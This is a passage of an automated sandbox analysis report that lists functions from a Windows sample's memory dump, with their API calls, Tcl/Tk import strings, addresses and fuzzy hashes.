Function 00007FF7691AF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691AF4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691AF597

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction ID: 5d3803f92845211881e63d25be5c5f99ac52e72a5e15fca33c32aa2e28fcc336
Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction Fuzzy Hash: FB51DA61B09252CAF62DBE26B40067AE6B1BF44BB8FA44634DD7D47BD5CE3CD8019720

Function 00007FF7691B9E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9ED6
GetLastError.KERNEL32(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9EE0

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: a0043869fd1f88a6122e54dd6c9e6b79920fa177b9c3f9d4a6f96f98f6811713
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: D3218711F1C642C1FE987F61B59037DA6B35F947A4FB84235DA2E477D9CE6CA4418320

Function 00007FF7691BB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7691BB5DD), ref: 00007FF7691BB490
GetLastError.KERNEL32(?,?,?,?,?,00007FF7691BB5DD), ref: 00007FF7691BB49A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: edd4a2c957f701c729d504657b930d7a95042024010cfe5e7d82f6c8050b47bb
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 99119161B18A91C1DA54AF26F884169B372BB44BF4FA84331EE7E47BE9CE7CD0508750

Function 00007FF7691B9C58 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: 8b76f08f711d2ddd62f3517543b504286192dcfc38b46fffa22cdedf7af79b65
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: 1FE08C10F08642C3FF0C7FF2B89407992B29FA8700BE48030C91E872A5EE2C68468630

Function 00007FF7691BB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BB1E4

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 32ce4742f2c3880c45a5b0e5e16a1bdfc2d66e0da6f8150cd1ca27090b7cb1fa
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 8241D332908201C7EA28AF15B59127DB3B2EB55B94FA40131D69E87AD8CF3CF502C760

Function 00007FF7691A76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7691A774A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 3ee270460560d51d175181f77da1ca21b78b4db27da0fa98a8bd59cb7ebf2586
Instruction ID: 6f79cfd9432875a84dd3bbbc2d39a909d240b9ffa5eccfb5efc51e3e76127f0f
Opcode Fuzzy Hash: 3ee270460560d51d175181f77da1ca21b78b4db27da0fa98a8bd59cb7ebf2586
Instruction Fuzzy Hash: 20219611F08651C5FA18BE96B5083BAE6A1BF45BD4FE84431EE0D07B8ACE7DE941C710

Function 00007FF7691BAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BACD2

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 9347c6d57750f04b78ff00014c1fd94af4c5ce005d4ecfb38a6ce5a9ff26a639
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: B731A021A18662C2F759BF15E8413BDA6B2AB50BB0FE54135EA6D433E6CE7CE4418330

Function 00007FF7691B8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7691B8CA7

Part of subcall function 00007FF7691B8DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF7691B8DC5
Part of subcall function 00007FF7691B8DA0: GetProcAddress.KERNEL32 ref: 00007FF7691B8DDB
Part of subcall function 00007FF7691B8DA0: FreeLibrary.KERNEL32 ref: 00007FF7691B8E02

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: 1b6e18f1b43ee7a29d32509c3ee8fbfb4a25623635a25c5396ca3e6c7b488ca3
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: F921A372A15706CAEB18AF64D4402EC73B1FB04B18FA40676D72C06AC9DF38E445C750

Function 00007FF7691B52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B5209

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: 8f6c764ad0c2c361205613e3be5214f9477736449020e5de6b46a47b47f8833b
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 32119621A1D681C1EA68BF51F41027EE276AF55B84FE44431EB4D976DECF3CD4418760

Function 00007FF7691C5664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C5687

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: 50e037da462eef05f8da5eadccf0c6dbab9b3df4636b6385c7c54e1ae8a76312
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: BA21957261CA81C6DB65AF18F480379B6B1EB94B94FB44234E65D876D9DF3CD4408B10

Function 00007FF7691AF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691AF730

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 677ca383739298bc03a8737a6d36311b32d9978a54b1ba4cba70b212086619d7
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 6701A921A08742C0E908FF566901069E6B5EB55FE0F984631DE6C13BDADE3CD8029710

Function 00007FF7691B720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B724A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction ID: 45daefdba4f69e11f294bef136bb5971a983ca4e18b97035857225eacfc1790e
Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction Fuzzy Hash: 5D018420E0E683C1FEAC7F65754117DD2B2AF55794FF84176FA5C42ACADE2CA4414220

Function 00007FF7691BDEA8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7691BA63A,?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A), ref: 00007FF7691BDEFD

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction ID: 26d5487a9bc74f70af2b30ee42672be82d9a11357d13930097067e797125c75b
Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction Fuzzy Hash: 38F06D88B09247C1FE5C7F6679513B5D2B65FA8B40FEC5436CA0E862D9DE2CE4828230

Function 00007FF7691BC90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF7691AFFB0,?,?,?,00007FF7691B161A,?,?,?,?,?,00007FF7691B2E09), ref: 00007FF7691BC94A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: 355f0ae6945eff8b08f54aa81d55d6ec4db1009abb077f67a4959e59eb23b2ee
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: 26F05800B18347C5FE5C7FA5785137992A25F99BA0FA84630982E862C9DE2CA4418230

Function 00007FF7691B7548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7561

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction ID: 850a78067e0a5dfad2be566c8950f11bee6bcfb3e4ea33cdc14565c8c914c430
Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction Fuzzy Hash: 97E0EC90F08257C2FA5D7EB865D22B9D1329F64340FE44031D949066DBDD1C78459631

Non-executed Functions

Function 00007FF7691A6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7691A6EB7
GetProcAddress.KERNEL32 ref: 00007FF7691A6EFD
GetProcAddress.KERNEL32 ref: 00007FF7691A6F22
GetProcAddress.KERNEL32 ref: 00007FF7691A6F47
GetProcAddress.KERNEL32 ref: 00007FF7691A6F6F
GetProcAddress.KERNEL32 ref: 00007FF7691A6F97
GetProcAddress.KERNEL32 ref: 00007FF7691A6FBF
GetProcAddress.KERNEL32 ref: 00007FF7691A6FE7
GetProcAddress.KERNEL32 ref: 00007FF7691A700F

Strings

Tcl_ConditionWait, xrefs: 00007FF7691A711D, 00007FF7691A7139
Tcl_DoOneEvent, xrefs: 00007FF7691A6F3D, 00007FF7691A6F59
Tcl_CreateThread, xrefs: 00007FF7691A6FDD, 00007FF7691A6FF9
Tcl_Finalize, xrefs: 00007FF7691A6F65, 00007FF7691A6F81
Tcl_MutexLock, xrefs: 00007FF7691A7055, 00007FF7691A7071
Tcl_CreateInterp, xrefs: 00007FF7691A6EF3, 00007FF7691A6F0F
Tcl_ThreadAlert, xrefs: 00007FF7691A716D, 00007FF7691A7189
Tcl_EvalEx, xrefs: 00007FF7691A72FD, 00007FF7691A7319
Tcl_FindExecutable, xrefs: 00007FF7691A6F18, 00007FF7691A6F34
Tcl_DeleteInterp, xrefs: 00007FF7691A6FB5, 00007FF7691A6FD1
Tcl_CreateObjCommand, xrefs: 00007FF7691A71E5, 00007FF7691A7201
Tcl_Free, xrefs: 00007FF7691A7375, 00007FF7691A7391
Tcl_GetVar2, xrefs: 00007FF7691A7195, 00007FF7691A71B1
Tcl_ConditionFinalize, xrefs: 00007FF7691A70CD, 00007FF7691A70E9
Tcl_NewStringObj, xrefs: 00007FF7691A7235, 00007FF7691A7251
Tcl_JoinThread, xrefs: 00007FF7691A702D, 00007FF7691A7049
Tk_GetNumMainWindows, xrefs: 00007FF7691A73C5, 00007FF7691A73E1
Tcl_EvalObjv, xrefs: 00007FF7691A7325, 00007FF7691A7341
Failed to get address for %hs, xrefs: 00007FF7691A6ED0
Tcl_GetString, xrefs: 00007FF7691A720D, 00007FF7691A7229
Tcl_GetCurrentThread, xrefs: 00007FF7691A7005, 00007FF7691A7021
Tcl_ConditionNotify, xrefs: 00007FF7691A70F5, 00007FF7691A7111
Tcl_Alloc, xrefs: 00007FF7691A734D, 00007FF7691A7369
Tcl_SetVar2Ex, xrefs: 00007FF7691A7285, 00007FF7691A72A1
Tcl_SetVar2, xrefs: 00007FF7691A71BD, 00007FF7691A71D9
Tcl_NewByteArrayObj, xrefs: 00007FF7691A725D, 00007FF7691A7279
Tcl_GetObjResult, xrefs: 00007FF7691A72AD, 00007FF7691A72C9
Tcl_FinalizeThread, xrefs: 00007FF7691A6F8D, 00007FF7691A6FA9
GetProcAddress, xrefs: 00007FF7691A6ED7
Tcl_ThreadQueueEvent, xrefs: 00007FF7691A7145, 00007FF7691A7161
Tcl_MutexUnlock, xrefs: 00007FF7691A707D, 00007FF7691A7099
Tcl_MutexFinalize, xrefs: 00007FF7691A70A5, 00007FF7691A70C1
Tk_Init, xrefs: 00007FF7691A739D, 00007FF7691A73B9
Tcl_EvalFile, xrefs: 00007FF7691A72D5, 00007FF7691A72F1
Tcl_Init, xrefs: 00007FF7691A6EB0, 00007FF7691A6EC9

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 69b9493a80f2cb657946bd6893dc7617ff764f2252706a07d89c38df2c437110
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 6FE1AF68A8DB07D1FA1DFF19B9501B8E3B5AF14791FF41036C81E026A4EF3CA959C621

Function 00007FF7691C33BC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF7691C340A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C3A76
